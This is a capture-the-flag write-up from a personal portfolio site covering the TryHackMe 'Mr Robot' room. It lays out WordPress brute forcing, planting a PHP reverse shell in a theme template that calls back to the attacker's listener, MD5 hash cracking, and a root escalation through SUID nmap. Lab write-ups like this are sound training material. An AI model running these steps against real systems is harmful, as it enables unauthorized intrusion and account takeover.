N E T H R A N. W E D A G E

Loading

Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.

Contact Info

Hire Me
Hire Me
Home / Portfolio / CTF / THM: Mr Robot CTF
cat ~/ctf/thm-mr-robot.md
CTF

THM: Mr Robot CTF

20 Feb 2024 Linux 3 Flags Medium

Mr Robot themed room — three hidden flags using WordPress exploitation, dictionary attack and SUID binary privilege escalation.

WordPress Brute Force PrivEsc Medium
Writeup

THM: Mr Robot CTF — Full Writeup

Mr Robot is a TryHackMe room inspired by the TV show of the same name. It runs a WordPress site with a hidden dictionary, weak credentials, and a vulnerable plugin that allows uploading a reverse shell. Privilege escalation is achieved via a SUID binary — specifically an old version of nmap that drops an interactive root shell.

Challenge Info

  • Platform: TryHackMe
  • OS: Linux
  • Difficulty: Medium
  • Flags: 3 keys hidden across the system

Step 1 — Enumeration

Start with a full Nmap scan to identify open ports and services:

nmap -sV -sC -p- --min-rate 5000 MACHINE_IP

Key results from the scan:

  • Port 80 — Apache httpd (WordPress site)
  • Port 443 — HTTPS (same WordPress site)
  • Port 22 — SSH (closed)

Only the web ports are open and accessible. SSH is closed so the entire attack chain runs through the web application.

Step 2 — Web Enumeration

Visiting the site presents an interactive Mr Robot themed terminal. Check standard files first — robots.txt reveals two entries: 

http://MACHINE_IP/robots.txt

# Output:
User-agent: *
fsocity.dic
key-1-of-3.txt

Download both files immediately:

wget http://MACHINE_IP/fsocity.dic
wget http://MACHINE_IP/key-1-of-3.txt

key-1-of-3.txt contains the first flag. fsocity.dic is a large wordlist that will be used to brute force the WordPress login. Deduplicate it first to speed up the attack: 

sort -u fsocity.dic > fsocity-uniq.dic
wc -l fsocity-uniq.dic
# Reduces from 858,160 to 11,451 unique words

Step 3 — WordPress Enumeration

Run WPScan to enumerate users and identify the WordPress version:

wpscan --url http://MACHINE_IP \
  --enumerate u

WPScan identifies the username elliot. Alternatively, the login error message on /wp-login.php leaks valid usernames — an invalid username returns Invalid username while a valid one returns incorrect password.

Step 4 — WordPress Brute Force

Use the deduplicated wordlist to brute force the password for user elliot: 

wpscan --url http://MACHINE_IP \
  --username elliot \
  --passwords fsocity-uniq.dic

WPScan finds the valid credentials:

Username: elliot
Password: ER28-0652

Log into the WordPress admin panel at /wp-admin.

Step 5 — Reverse Shell via WordPress

From the WordPress admin panel, navigate to Appearance > Editor and select the 404.php template. Replace its contents with a PHP reverse shell. Use the PentestMonkey reverse shell: 

# Set your tun0 IP and port in the shell before pasting
# Download from:
# https://github.com/pentestmonkey/php-reverse-shell

# Edit these two lines in the shell:
$ip = '10.10.14.X';
$port = 4444;

Set up a Netcat listener, then trigger the shell by visiting a non-existent page:

nc -lvnp 4444
curl http://MACHINE_IP/nonexistent-page

A shell arrives as the daemon user.

Step 6 — Key 2 and Password Hash

Stabilise the shell then navigate to the robot user's home directory: 

# Stabilise the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Navigate to robot's home
cd /home/robot
ls -la

Two files are present:

  • key-2-of-3.txt — readable only by robot
  • password.raw-md5 — readable by all

Read the MD5 hash and crack it offline:

cat /home/robot/password.raw-md5
# robot:c3fcd3d76192e4007dfb496cca67e13b

# Crack with hashcat
hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b \
  /usr/share/wordlists/rockyou.txt

The cracked password is abcdefghijklmnopqrstuvwxyz. Switch to the robot user and read the second flag: 

su robot
# Password: abcdefghijklmnopqrstuvwxyz

cat /home/robot/key-2-of-3.txt

Step 7 — Privilege Escalation (SUID Nmap)

Search for SUID binaries on the system to find privilege escalation vectors: 

find / -perm -4000 -type f 2>/dev/null

The output includes /usr/local/bin/nmap — an old version of nmap (3.81) that has an interactive mode allowing shell execution: 

nmap --interactive
# Inside nmap interactive mode:
!sh

whoami
# root

The !sh command inside nmap's interactive mode spawns a root shell via the SUID bit.

Step 8 — Key 3

With a root shell, grab the final flag:

# Key 3
cat /root/key-3-of-3.txt

Key Takeaways

  • Always check robots.txt — it can expose sensitive files and wordlists
  • WordPress login errors leak valid usernames — use them to target brute force
  • Deduplicate wordlists before brute forcing — dramatically reduces attack time
  • WordPress theme editors allow arbitrary PHP execution — a common privesc vector
  • SUID binaries like old nmap versions can be abused to escape to root
  • MD5 password hashes with no salt are trivially cracked with rockyou.txt

Tools Used

  • nmap — port scanning and service enumeration
  • wpscan — WordPress enumeration and brute forcing
  • gobuster — web directory enumeration
  • netcat — reverse shell listener
  • hashcat — MD5 hash cracking
  • php-reverse-shell — PentestMonkey PHP shell
  • find — SUID binary discovery
Project Info
Category CTF
Difficulty Medium
OS / Target Linux
Points 3 Flags
Date 20 Feb 2024
Tools Used
Nmap WPScan Hydra Netcat
Actions
Back to CTF Get In Touch
More CTF
CTF
THM: Advent of Cyber 2023

Multi-day Capture The Flag — 24 challenges spanning web exploitation, OSINT, digital forensics, reverse engineering, and cryptography.

Jan 2024 Details